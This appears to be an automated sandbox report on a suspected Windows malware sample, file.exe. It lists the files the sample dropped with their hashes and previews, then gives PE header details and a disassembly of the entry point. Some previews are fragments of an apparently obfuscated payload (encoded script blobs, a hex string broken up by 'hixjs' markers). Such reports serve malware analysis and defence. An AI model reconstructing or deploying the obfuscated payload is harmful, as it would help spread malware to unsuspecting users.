                                                                                                                                                                                                                                                    SSDEEP:48:cvIwWl8zsnRJg771I9JeWpW8VYfYm8M4JYmFkJyq85ckb9Q3jd:uIjfnjI7ef7VLJGqba3jd
                                                                                                                                                                                                                                                    MD5:D46C2BADB4AEA6AEE373E0D4FD547C0F
                                                                                                                                                                                                                                                    SHA1:6B7C70A4BF1E341025AE1E60F22F0DE677910BC1
                                                                                                                                                                                                                                                    SHA-256:0727B48959E52ED489D7F5A2C3AC40FB81B725A6D9212923EAA3E7495C1E4D9C
                                                                                                                                                                                                                                                    SHA-512:EC89E22E51AB64DCAC72006730241BE826F23AE9887CCA57929EA4C2C1F997ADCEE68A27511AF4890D4FE88A32E29EFD9959E1F5D0E3CCACAF62B9291EAE8A78
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643921" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):108216
                                                                                                                                                                                                                                                    Entropy (8bit):4.005560478368003
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:b7F9oInjxkCGnzOP2jk0+ACWHpfnzbNyLYduJxP7pxoZsR1v9nvnFOOmdypfR3YG:hdkrzPrJvzgxhGiwGGnS5mFwiKuiTl+a
                                                                                                                                                                                                                                                    MD5:33B5E965E4CA22B8D1AFCCCECF721C32
                                                                                                                                                                                                                                                    SHA1:F09FD036B58CD7B1EE8E9A52C0F494791D4F6E08
                                                                                                                                                                                                                                                    SHA-256:07F7452B78D7CD7FCA4E69D9E2349D811682B1EB4C88D1588CE4ED38C5600607
                                                                                                                                                                                                                                                    SHA-512:AAD4C259D40E1A95115D23F7EACA8471B2B9ED8E5B57108E702194F178B4CF2C383F61666F3C259FCD58F883AAE03343F9AF6180449597428FD4162A699CB4E5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s
                                                                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):108216
                                                                                                                                                                                                                                                    Entropy (8bit):4.006735880796696
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:d5F9omnjxk6G7zOP2jk0+ACWHpfnz/NmLYduJxP7pxoZsR1v933nFOOmdypfR3Yg:LdkfzPrJvzEZhGiwGGnOlmFYiKeiZl+a
                                                                                                                                                                                                                                                    MD5:74BA5B1B12DAEDC78FF365562E6D0974
                                                                                                                                                                                                                                                    SHA1:9E266E7A6F7887C7F912CC8B01915D65708A12DC
                                                                                                                                                                                                                                                    SHA-256:9ED23444E82B05AC511DF50EFEDB33E095A19CE8DF6F14523AB2045AC9101C7F
                                                                                                                                                                                                                                                    SHA-512:0021B6AD3552EB61C643DE28007D40750D387D76C646C0D8E6B884092718657C18BA7DC2AB63E3B2ECA501446560B668BFB7F15D05B985419BA4D9E827DFED73
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s
                                                                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):891
                                                                                                                                                                                                                                                    Entropy (8bit):5.191505485958786
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:Yzc2ZGtHeG40BBkC3c2SjrkHt0drc6hE1opM:YzDmJBzDqrgt0drcAEMM
                                                                                                                                                                                                                                                    MD5:8A21CD8990999FC54A3D650ED5D014D2
                                                                                                                                                                                                                                                    SHA1:45E7C18284CB592FA14C3597111797A40C7B9AB8
                                                                                                                                                                                                                                                    SHA-256:9B7B9BFB8C86502BE7B1BA572D9E71FC00935F1BF87FDB0B910170A5707B92C4
                                                                                                                                                                                                                                                    SHA-512:25EF8E95C96886C04FAA2F1216C79F7E42E827CB7205B85931BC17F0E16D4F174C5FC7BF6AB1B851EBDE111A93018040559D2A1FE2BBDEAB7794FE25B3A6F84C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:{"serviceContext":{"serviceActivityId":"cb18b741-9087-4e9f-a291-b14e61e8ec32","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"cb18b741-9087-4e9f-a291-b14e61e8ec32|2024-12-23T12:58:48.0498204Z|fabric_msn|EUS2-A|News_438","tier":"\u0000","clientActivityId":"09FA015E-7B4F-4ED8-A5D2-064DB861FB0A"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false,"1SlockscreenContentEnabled":true,"setMUIDOnMultipleDomains":false},"isPartial":false}
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):15034
                                                                                                                                                                                                                                                    Entropy (8bit):7.578012176929356
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:M9/RcKo4RzResR5s3e4w2+yCYneynsTMjSg/MOhRApRk0OU:MRcTaEsHs3e4iysTMjUb
                                                                                                                                                                                                                                                    MD5:6508A0C17354946EC6B1531459A7B45E
                                                                                                                                                                                                                                                    SHA1:A409C6B7820B73507B58F06BDFAED09B5F48CB23
                                                                                                                                                                                                                                                    SHA-256:EEEBDCF2015381FB304A474F24DBAAB537980E3F2C1F244CB8730E35FC47A130
                                                                                                                                                                                                                                                    SHA-512:B0A315F3A99BC5A1045E461DC4B4BC9504F722E00817407B84CACE3F1939AA50D70218E09D9B4B1B87FBF27311DE5223B3D40085BADF357DB31739899FE85AFA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:EA06.....Zo.........SP.n......5e...`.....|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....|.0...&d.....Hz..a....l?..uo.....P......V0....j......|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...|.*..<..aw.].3c..H.@B?...G..1...' ....k|.A.O..#.....}V`....#..H|.P!..d....0z....Y..>K..G.*/....G.7c.H..b....W..1....?.01..b.!...@.?..o.F|....p9......S.!..nb.!....zb0..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):183050
                                                                                                                                                                                                                                                    Entropy (8bit):7.979901482148886
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:MgpM7LsljYUvkvbY5+7zLtGgaddUPcogD2PXgw07/LGT/RJBPwbjFQdYM55EezN2:MgkLsx5vk85+7nsgaddoldPQNERwbjmG
                                                                                                                                                                                                                                                    MD5:4C24081CA4AE444F1B41B855AD6687BD
                                                                                                                                                                                                                                                    SHA1:59782AD6913C7BF6767B254AA602B7DE6ECA52CC
                                                                                                                                                                                                                                                    SHA-256:218BDCC63D5BC0224C54AEAE6F964806FBAAE64E45865D2E46F3A7D8E4F612A9
                                                                                                                                                                                                                                                    SHA-512:058422237C246FC243BED6F3C16A28C4603ED5C8704136070B432BAA96731A2DC0A9D1A560EB8456148FA1AE4DC3B33CF4D92226FE2999458F63393CFB7D1CD6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:EA06.....Bc...RmS.Zy...s...\{.z.c...Mk{..z.I..j..mN.S.......'...]....?.{.q.S#...6E]..s...C(.[fs...q'..*7J$.A...m18... .L..z<...L...o..$........'......HeQoT>....$..TZo.._..oL"I0..%1.h......j.R.T..Td.cZ.b.X.Vk4.5X..v.]2.W.._.I......h...>.W.Vi`.4.R....S...91L..z..*.S..{.I.N......W..'..X.....L.yj.....@*..oZj..._...'..........................n..ZW#'#.C.4..........Z.e.}..R.....m....p......V._+..,zy..Pk.z..;].l..Y.So...5<F.[.P..z.#A...k.M.z....$..fh...Y.....S..{.N.J...P.1)...\.^h.-E~7_.OkU..[.D.m.[.u8.1..6Z.EN...W..-'._T.gx...3q_..h.,..OH.a.4Nh..V.b...gr.[..8..[M@.Ek].P.YP....s.'..w{-e^....:..`..\..h..^.%..T...$.%...t=.>......#.....7Y|....W.....T..^./\.........{.S......lu..6.#...39-.6.......n...dv........;.|..s...j<X.c...B3[.F...a.......z.......o.."....{u.4...n..Y.b.=..8.-.f?..F.....W.....e..Q..;..V.a@...;...A.Gu...O...o.<..bs...t0.}o.....Z+.....Q7.-.KKj.l.....kK..z.Y.....q..|t..5...-L......=M.#...w!.\_r.`.av..<C...t...?b.{........Y.U..z.f.Uy?Z&.=.
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):172054
                                                                                                                                                                                                                                                    Entropy (8bit):3.181772124901705
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:sb3feqfCpfS6ftqfA0f9fWf9fZ1fi20fq0fFfY6fofi51fK0fi0fCfZ1fK0f70fB:iaNS3Hx7LIaDf/QDXz68rCkup3c3klX
                                                                                                                                                                                                                                                    MD5:58120F04CD4576726BCAD5950AD62E93
                                                                                                                                                                                                                                                    SHA1:B831F6C0235ECAB1DB66F3DD5650C1E7A9DF7684
                                                                                                                                                                                                                                                    SHA-256:238DB99B9E4EDEEC50FF211B02FAEA0590981B4E5B034E4C462569A52DDB83F7
                                                                                                                                                                                                                                                    SHA-512:B1F568CECB8869819F2A2984A331F812078B72DD93D4A9B0C1AC18470E4E0AC3D6C41594D10751F70A53D8A0BB7F0348FCA7DEDEBD6B3DD5E17E473EF1FB8F9A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:hixjs0hixjsxhixjs5hixjs5hixjs8hixjsbhixjsehixjschixjs8hixjs1hixjsehixjschixjschixjschixjs0hixjs2hixjs0hixjs0hixjs0hixjs0hixjs5hixjs6hixjs5hixjs7hixjsbhixjs8hixjs6hixjsbhixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjs4hixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjs6hixjsbhixjsahixjs7hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjs8hixjsbhixjs8hixjs6hixjsehixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjsahixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjschixjsbhixjsahixjs6hixjschixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjsehixjsbhixjs8hixjs3hixjs3hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs9hixjs0hixjsbhixjs9hixjs3hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixj
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                    File Type:ARC archive data, squashed
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):189440
                                                                                                                                                                                                                                                    Entropy (8bit):7.8426916173774925
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:sjG41+Wkzp39nxwPo1N9qKcuxW+NNJCSu2o2PVAutLnyeFibWq6mgKJQtBq76:si4Ubzp3gP+qKxWMiSu2tBdnVw1PEo76
                                                                                                                                                                                                                                                    MD5:CAA0BD96580ABD511C795B895AC50341
                                                                                                                                                                                                                                                    SHA1:3971AFD488781EA21B604A9BD2E2B1CFF094A6E6
                                                                                                                                                                                                                                                    SHA-256:BA3C130FBBECD0DEA2C5135538764F48F82F1BA8381BD82A7CA604FE4534AFFC
                                                                                                                                                                                                                                                    SHA-512:4769801AEBD2271886F5E65503B282B07BF4F45A290BE7A94A0268E046BC3DFF980B2CA679E09CA4D52E0A74A852DC777D9036E4ED3CA935F0121F5C327926AF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:.....T6SNi.@..q.WP...|5[...SIWMPZMSWSYJ4T6SN1NSIWMPZMSWSY.4T6]Q.@S.^.q.L..r."]'.#<^)!(:m3;#=8'y(QtD& .'=i...z <36wG9^.SN1NSIW>Ao.d'..}D..d>j..O..!*...U...$m..7...'...$0?d)..T6SN1NSI..PZ.RVS=...6SN1NSIW.PXLXVYYJ.V6SN1NSIWM`.LSWCYJ4.4SN1.SIGMPZOSWVYK4T6SN4NRIWMPZM.USYH4T6SN1LS..MPJMSGSYJ4D6S^1NSIWM@ZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWc$?5'WSY..V6S^1NS.UMPJMSWSYJ4T6SN1NSiWM0ZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NS
                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Entropy (8bit):6.703836411064381
                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                    File name:file.exe
                                                                                                                                                                                                                                                    File size:1'482'240 bytes
                                                                                                                                                                                                                                                    MD5:b96e6785937bd52b1281fb98f0abcf25
                                                                                                                                                                                                                                                    SHA1:d27572ada589769bfdb99dabbd485556e39010ba
                                                                                                                                                                                                                                                    SHA256:519678c24f6036d935bdd915090f07ad1fea068dc2491861648c6b00698de514
                                                                                                                                                                                                                                                    SHA512:39aadf908dcbb16588e5a93f7c633224d3ba7aa3bed54ae96e3fb9320fc080b6da7987b8d66d279266045b1aaafc1788b47bb72558ff42371acd55e8f768304d
                                                                                                                                                                                                                                                    SSDEEP:24576:Gtb20pkaCqT5TBWgNQ7aMhKG+mrh1JPUc9g56A:zVg5tQ7aMhKG+mrPVD9k5
                                                                                                                                                                                                                                                    TLSH:9665CF1223EDCFA5C77143337EA4B7526E7F7D25A571F6472F842A2CB930A24412A523
                                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                                                                                                                                                                                                    Icon Hash:17394d716d69338e
                                                                                                                                                                                                                                                    Entrypoint:0x425f74
                                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                    Time Stamp:0x676915E0 [Mon Dec 23 07:48:48 2024 UTC]
                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                                                                                    OS Version Minor:1
                                                                                                                                                                                                                                                    File Version Major:5
                                                                                                                                                                                                                                                    File Version Minor:1
                                                                                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                                                                                    Subsystem Version Minor:1
                                                                                                                                                                                                                                                    Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                    call 00007FAD248A32CFh
                                                                                                                                                                                                                                                    jmp 00007FAD248962E4h
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                                    mov esi, dword ptr [esp+10h]
                                                                                                                                                                                                                                                    mov ecx, dword ptr [esp+14h]
                                                                                                                                                                                                                                                    mov edi, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                    mov eax, ecx
                                                                                                                                                                                                                                                    mov edx, ecx
                                                                                                                                                                                                                                                    add eax, esi
                                                                                                                                                                                                                                                    cmp edi, esi
                                                                                                                                                                                                                                                    jbe 00007FAD2489646Ah
                                                                                                                                                                                                                                                    cmp edi, eax
                                                                                                                                                                                                                                                    jc 00007FAD248967CEh
                                                                                                                                                                                                                                                    bt dword ptr [004C0158h], 01h
                                                                                                                                                                                                                                                    jnc 00007FAD24896469h
                                                                                                                                                                                                                                                    rep movsb
                                                                                                                                                                                                                                                    jmp 00007FAD2489677Ch
                                                                                                                                                                                                                                                    cmp ecx, 00000080h
                                                                                                                                                                                                                                                    jc 00007FAD24896634h
                                                                                                                                                                                                                                                    mov eax, edi
                                                                                                                                                                                                                                                    xor eax, esi
                                                                                                                                                                                                                                                    test eax, 0000000Fh
                                                                                                                                                                                                                                                    jne 00007FAD24896470h
                                                                                                                                                                                                                                                    bt dword ptr [004BA370h], 01h
                                                                                                                                                                                                                                                    jc 00007FAD24896940h
                                                                                                                                                                                                                                                    bt dword ptr [004C0158h], 00000000h
                                                                                                                                                                                                                                                    jnc 00007FAD2489660Dh
                                                                                                                                                                                                                                                    test edi, 00000003h
                                                                                                                                                                                                                                                    jne 00007FAD2489661Eh
                                                                                                                                                                                                                                                    test esi, 00000003h
                                                                                                                                                                                                                                                    jne 00007FAD248965FDh
                                                                                                                                                                                                                                                    bt edi, 02h
                                                                                                                                                                                                                                                    jnc 00007FAD2489646Fh
                                                                                                                                                                                                                                                    mov eax, dword ptr [esi]
                                                                                                                                                                                                                                                    sub ecx, 04h
                                                                                                                                                                                                                                                    lea esi, dword ptr [esi+04h]
                                                                                                                                                                                                                                                    mov dword ptr [edi], eax
                                                                                                                                                                                                                                                    lea edi, dword ptr [edi+04h]
                                                                                                                                                                                                                                                    bt edi, 03h
                                                                                                                                                                                                                                                    jnc 00007FAD24896473h
                                                                                                                                                                                                                                                    movq xmm1, qword ptr [esi]
                                                                                                                                                                                                                                                    sub ecx, 08h
                                                                                                                                                                                                                                                    lea esi, dword ptr [esi+08h]
                                                                                                                                                                                                                                                    movq qword ptr [edi], xmm1
                                                                                                                                                                                                                                                    lea edi, dword ptr [edi+08h]
                                                                                                                                                                                                                                                    test esi, 00000007h
                                                                                                                                                                                                                                                    je 00007FAD248964C5h
                                                                                                                                                                                                                                                    bt esi, 03h
                                                                                                                                                                                                                                                    jnc 00007FAD24896518h
                                                                                                                                                                                                                                                    movdqa xmm1, dqword ptr [esi+00h]
                                                                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                    • [ASM] VS2012 UPD4 build 61030
                                                                                                                                                                                                                                                    • [RES] VS2012 UPD4 build 61030
                                                                                                                                                                                                                                                    • [LNK] VS2012 UPD4 build 61030
                                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000xa0de0.rsrc
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1650000x6c4c.reloc
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                    .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                    .rsrc0xc40000xa0de00xa0e00120f266359a8700f7f9f7cd6fe0ebcc2False0.5918059804778555data6.633591343110549IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    .reloc0x1650000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                    RT_ICON0xc45d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                                                                                                                                    RT_ICON0xc47000x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                                                                                                                                    RT_ICON0xc48280x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                                                                                                                                    RT_ICON0xc49500x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishGreat Britain0.34382119714767584
                                                                                                                                                                                                                                                    RT_ICON0x1069780x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.4301727197444694
                                                                                                                                                                                                                                                    RT_ICON0x1171a00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishGreat Britain0.5156874080302711
                                                                                                                                                                                                                                                    RT_ICON0x1206480x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishGreat Britain0.5365526802218115
                                                                                                                                                                                                                                                    RT_ICON0x125ad00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishGreat Britain0.5247401983939537
                                                                                                                                                                                                                                                    RT_ICON0x129cf80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5785269709543569
                                                                                                                                                                                                                                                    RT_ICON0x12c2a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6036585365853658
                                                                                                                                                                                                                                                    RT_ICON0x12d3480x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishGreat Britain0.6827868852459016
                                                                                                                                                                                                                                                    RT_ICON0x12dcd00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7535460992907801
                                                                                                                                                                                                                                                    RT_MENU0x12e1380x50dataEnglishGreat Britain0.9
                                                                                                                                                                                                                                                    RT_STRING0x12e1880x594dataEnglishGreat Britain0.3333333333333333
